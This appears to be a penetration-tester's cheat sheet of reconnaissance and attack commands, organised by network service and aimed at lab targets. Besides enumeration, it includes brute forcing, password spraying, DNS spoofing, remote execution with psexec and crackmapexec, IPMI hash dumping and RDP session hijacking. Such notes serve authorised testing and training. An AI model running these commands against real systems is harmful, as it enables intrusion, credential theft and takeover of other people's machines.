Protocols & Services
Infrastructure-based Enumeration
# Certificate Transparency
curl -s https://crt.sh/\?q\=domain.com\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u
# grep for accessible subdomains
for i in $(cat subdomainlist);do host $i | grep "has address" | grep domain.com | cut -d" " -f1,4;done
# Scan each IP address in a list using Shodan
for i in $(cat ip-addresses.txt);do shodan host $i;done
# Cloud Resources
https://domain.glass
https://buckets.grayhatwarfare.com
# Google dorking
intext:domain.com inurl:blob.core.widows.net
intext:domain.com inurl:amazonaws.comHost-based Enumeration
FTP / 21
# Interact with the FTP service on the target.
ftp <FQDN/IP>
nc -nv <FQDN/IP> 21
telnet <FQDN/IP> 21
# Interact with the FTP service on the target using encrypted connection.
openssl s_client -connect <FQDN/IP>:21 -starttls ftp
# Download all available files on the target FTP server.
wget -m --no-passive ftp://anonymous:anonymous@<target>
# Brute Forcing avec Medusa
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
# FTP Bounce Attack
nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2SMB / 139 , 445
# Enumerating SMB shares using null session authentication.
crackmapexec smb <IP> --shares -u '' -p ''
smbclient -N -L //<IP>
smbclient //<IP>/<share> # Connect to a specific SMB share.
smbmap -H <IP> -r # -r ou -R for récursive
smbmap -H <IP> --download "notes\note.txt" # to download a file
# Interaction with the target using RPC.
rpcclient -U "" <FQDN/IP>
srvinfo # Server information.
enumdomains # Enumerate all domains that are deployed in the network.
querydominfo # Provides domain, server, and user information of deployed domains.
netshareenumall # Enumerates all available shares.
netsharegetinfo <share> # Provides information about a specific share.
enumdomusers # Enumerates all domain users.
queryuser <RID> # Provides information about a specific user.
# Username enumeration using Impacket scripts.
samrdump.py <FQDN/IP>
# SMB enumeration using enum4linux.
enum4linux-ng.py <FQDN/IP> -A -C
# Interacting with SMB using CMD
C:\htb> dir \\192.168.220.129\Finance\
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
C:\htb> dir n: /a-d /s /b # list all files in n:
C:\htb> dir n: /a-d /s /b # search for specific names in files
c:\htb> findstr /s /i cred n:\*.* # search for a specific word within a file
# Interacting with SMB using PowerShell
Get-ChildItem \\192.168.220.129\Finance\
# Authenticate to a share
$username = 'us3r'
$password = 'P@sswd'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\10.10.0.9\Finance" -PSProvider "FileSystem" -Credential $cred
# Search for specific names in files
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
# Search for a specific word within a file
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
# Interacting with SMB using Linux
sudo mount -t cifs -o username=us3r,password=P@sswd,domain=. //10.10.0.9/Finance /mnt/Finance
# Connect to a remote machine with a local administrator : impacket-smbexec, impacket-atexec
impacket-psexec administrator:'Password123!'@10.10.110.17
# Execute command with cme
crackmapexec smb 10.10.1.2 -u Administrator -p 'P@sswd' -x 'whoami' --exec-method smbexec
# CVE-2020-0796 "SMBGhost"NFS / 2049
# Nmap
sudo nmap --script nfs* <FQDN/IP> -sV -p111,2049
# Show available NFS shares.
showmount -e <FQDN/IP>
# Mount the specific NFS share to ./target-NFS
sudo mount -t nfs <FQDN/IP>:/<share> ./target-NFS/ -o nolock
# Unmount the specific NFS share.
umount ./target-NFS DNS / 53
# ANY request to the specific nameserver.
dig any <domain.tld> @<nameserver>
# NS request to the specific nameserver.
dig ns <domain.tld> @<nameserver>
# AXFR request to the specific nameserve AKA DNS Zone Transfer
dig axfr <domain.tld> @<nameserver>
fierce --domain zonetransfer.me
# Subdomain brute forcing.
dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o subs.txt -f ~/wordlist.txt domain.htb
subbrute domain.htb -s ./wordlist.txt -r ./resolvers.txt
for sub in $(cat wordlist.txt);do dig $sub.domain.htb @10.1.1.1 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subs.txt;done
# DNS spoofing AKA DNS Cache Poisoning
# Change etter.dns file and run ettercap. set target 1 (cible) and target 2 (gateway) and activate dns_spoof plugin
cat /etc/ettercap/etter.dns
inlanefreight.com A 192.168.225.110 # Attacker IP
*.inlanefreight.com A 192.168.225.110Email Services : SMTP : 25,465,587 / IMAP4 : 143,993 / POP3 : 110,995
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 <IP>
# SMTP : 25,465,587
telnet <IP> 25
# VRFY, EXPN, RCPT TO : can be used to enumerate valid usernames
smtp-user-enum -M RCPT -U userlist.txt [-D inlanefreight.htb] -t <IP>
# Password Attack : SMTP, POP3, IMAP4
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
# Open Relay
nmap -p25 -Pn --script smtp-open-relay <IP>
swaks --from notif@domain.com --to employees@domain.com --header 'Subject: Company Notif' --body 'Hi All, Test message' --server 10.10.1.1
# IMAP4 : 143,993
# use Evolution for GUI
# Log in to the IMAPS service using cURL.
curl -k 'imaps://<FQDN/IP>' --user <user>:<password>
# Connect to the IMAPS service.
openssl s_client -connect <FQDN/IP>:imaps
# IMAPS Commands examples
1 LOGIN username password # User's login.
1 LIST "" * # Lists all directories.
1 CREATE "INBOX" # Creates a mailbox with a specified name.
1 DELETE "INBOX" # Deletes a mailbox.
1 RENAME "ToRead" "Important" # Renames a mailbox.
1 LSUB "" * # Returns a subset of names from the set of names that the User has declared as being active or subscribed.
1 SELECT INBOX # Selects a mailbox
1 UNSELECT INBOX # Exits the selected mailbox.
1 FETCH <ID> all # Retrieves data associated with a message in the mailbox.
1 CLOSE # Removes all messages with the Deleted flag set.
1 LOGOUT # Closes the connection with the IMAP server.
# POP3 : 110,995
# Connect to the POP3s service.
openssl s_client -connect <FQDN/IP>:pop3s
# POP3s Commands examples
USER username # Identifies the user : can be used for user enum
PASS password # Authentication of the user using its password.
STAT # Requests the number of saved emails from the server.
LIST # Requests from the server the number and size of all emails.
RETR id # Requests the server to deliver the requested email by ID.
DELE id # Requests the server to delete the requested email by ID.
CAPA # Requests the server to display the server capabilities.
RSET # Requests the server to reset the transmitted information.
QUIT # Closes the connection with the POP3 server.
# Cloud Enumeration
# Username enumeration and password spraying (o365spray, MailSniper, CredKing)
./o365spray.py --enum -U users.txt --domain msplaintext.xyz
./o365spray.py --spray -U users.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyzSNMP / 161 UDP
# Bruteforcing community strings of the SNMP service.
onesixtyone -c community-strings.list <FQDN/IP>
nmap -sU <FQDN/IP> -p 161 --script=snmp-brute -Pn --script-args snmp-brute.communitiesdb=snmp.txt
# Querying OIDs using snmpwalk.
snmpwalk -v2c -c <community string> <FQDN/IP>
# Bruteforcing SNMP service OIDs.
braa <community string>@<FQDN/IP>:.1.*MySQL / 3306
# Login to the MySQL server.
mysql -u username -pPassword123 -h <FQDN/IP> # Linux
mysql.exe -u username -pPassword123 -h <FQDN/IP> # Windows
# GUI Application for MSSQL, MySQL, PostgreSQL
dbeaver &MSSQL / 1433
# Banner Grabbing
nmap -Pn -sV -sC -p1433 10.10.10.125
# MSSQL Ping in Metasploit
auxiliary/scanner/mssql/mssql_ping
# NMAP MSSQL Script Scan
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP/FQDN>IPMI / 623 UDP
# Nmap
sudo nmap -sU --script ipmi-version -p 623 IP
# IPMI version detection.
msf6 auxiliary(scanner/ipmi/ipmi_version)
# Dump IPMI hashes.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes)Linux Remote Management
# Remote security audit against the target SSH service.
ssh-audit.py <FQDN/IP>
# Log in to the SSH server using the SSH client : -v optional for verbosity
ssh [-v] <user>@<FQDN/IP>
# Log in to the SSH server using private key.
ssh -i private.key <user>@<FQDN/IP>
# Enforce password-based authentication.
ssh <user>@<FQDN/IP> -o PreferredAuthentications=password
# Scanning for Rsync
sudo nmap -sV -p 873 <FQDN/IP>
# Probing for Accessible Shares
nc -nv <FQDN/IP> 873
# Enumerating an Open Share
rsync -av --list-only rsync://127.0.0.1/dev
# Sync the file to attack host
rsync -av rsync://127.0.0.1/devRDP / 3389
# Nmap
nmap -sV -sC 10.129.201.248 -p3389 --script rdp*
# Check the security settings of the RDP service.
rdp-sec-check.pl <FQDN/IP>
# Log in to the RDP server from Linux.
xfreerdp /u:<user> /p:"<password>" /v:<FQDN/IP>
rdesktop -u user <FQDN/IP>
# Password spraying
hydra -L users.txt -p 'password123' 192.168.2.143 rdp
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# RDP Session Hijacking
# We need SYSTEM privileges for this to work
query user
tscon {TARGET_SESSION_ID} /dest:{OUR_SESSION_NAME}
# Admin priv to SYSTEM priv by creating a service / no longer works on Server 2019
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
net start sessionhijack
# CVE-2019-0708 BlueKeep https://github.com/RICSecLab/CVE-2019-0708WinRM / 5985
# Log in to the WinRM server.
# Windows PS
Test-WSMan <FQDN/IP>
# Linux
evil-winrm -i <FQDN/IP> -u <user> -p <password>
# Execute command using the WMI service.
wmiexec.py <user>:"<password>"@<FQDN/IP> "<system command>" Oracle TNS / 1521
# Perform a variety of scans to gather information about the Oracle database services and its components.
./odat.py all -s <FQDN/IP>
# Log in to the Oracle database.
sqlplus <user>/<pass>@<FQDN/IP>/<db>
# Upload a file with Oracle RDBMS.
./odat.py utlfile -s <FQDN/IP> -d <db> -U <user> -P <pass> --sysdba --putFile C:\\insert\\path file.txt ./file.txtLast updated